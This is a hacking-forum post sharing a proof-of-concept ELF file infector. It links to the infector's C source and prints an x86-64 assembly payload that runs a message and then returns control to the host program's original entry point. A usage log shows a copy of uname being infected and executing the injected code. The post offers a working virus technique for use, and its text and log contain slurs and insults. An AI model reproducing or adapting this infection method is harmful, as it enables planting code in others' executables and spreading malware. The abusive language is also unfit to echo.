Sign in to follow this  
Followers 0
mesvak

infect ELF binary simple poC and asmbelly shown with usage

By mesvak in C#, C++ & VB.net

Recommended Posts

mesvak    362

mesvak

this is so simple just you needa know 

knowing stuff in C/C++
knowing stuff in Intel x86 assembly
Knowledge of the WinAPI and its documentation
Knowledge of the PE file structure
Knowledge of Dynamic Linked Libraries

[hide]

poc .c

written in c++

https://pastr.io/view/sbYDYI

 

 

 

and asmbelly code

 

 

section .text
       global _start
_start:
sub r12, 0x4f20
push rax
push rdi
push rsi
push rdx

       mov rax,1       ; [1] - sys_write
       mov rdi,1       ; 0 = stdin / 1 = stdout / 2 = stderr
       lea rsi,[rel msg]     ; pointer(mem address) to msg (*char[])
       mov rdx, msg_end - msg      ; msg size
       syscall         ; calls the function stored in rax

pop rdx
pop rsi
pop rdi
pop rax
jmp r12
align 8
       msg     db 'Infected file Test',0x0a,0
       msg_end db 0x0

 

and usage 

written by shitty hands 

 

$ cp / bin / uname evil_uname
$ ./niga evil_uname
ELF virus example

Running in offset mode + Mapped file (35032 bytes) at 0x7fff7ae5a540
+ Processing Victim -> Entry point value: 0x1f60
+ Processing Victim -> Found .text segment executable (# 2)
   * Processing Victim -> Found segment LOAD (# 3) closed for .text (offset: 0x7990)
offset == 0x4f20
$ #change offset on shellcoda.asm
$ nasm -f elf64 shellcode.asm
$ ./niga evil_uname shellcode.o
ELF virus example

+ Mapped file (35032 bytes) at 0x7ffc51d5d920
+ Processing Victim -> Entry point value: 0x1f60
+ Processing Victim -> Found .text segment executable (# 2)
   * Processing Victim -> Found segment LOAD (# 3) closed for .text (offset: 0x7990)
+ Processing victim -> Base Address: 0x (nil)
+ Mapped file (704 bytes) in 0x7ffc51d5d928
+ Payload Process -> Number of Sections in the Payload file: 5. Searching for the '.text' section
 + Processing payload -> sname: ''
 + Processing payload -> sname: '.text'
has entered the returning if
shdr-> sh_name: 1
shdr-> sh_type: 1
shdr-> sh_addr: 0
+ Processing Payload -> Section .text Payload file found in offset 180 (Size: 4a bytes)
$ ./evil_uname
Infected file Test
me no gae u are all retarded plebs Xd 
Linux

 

 

 

[/hide]

Share this post

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Sign in to follow this  
Followers 0
Go To Topic Listing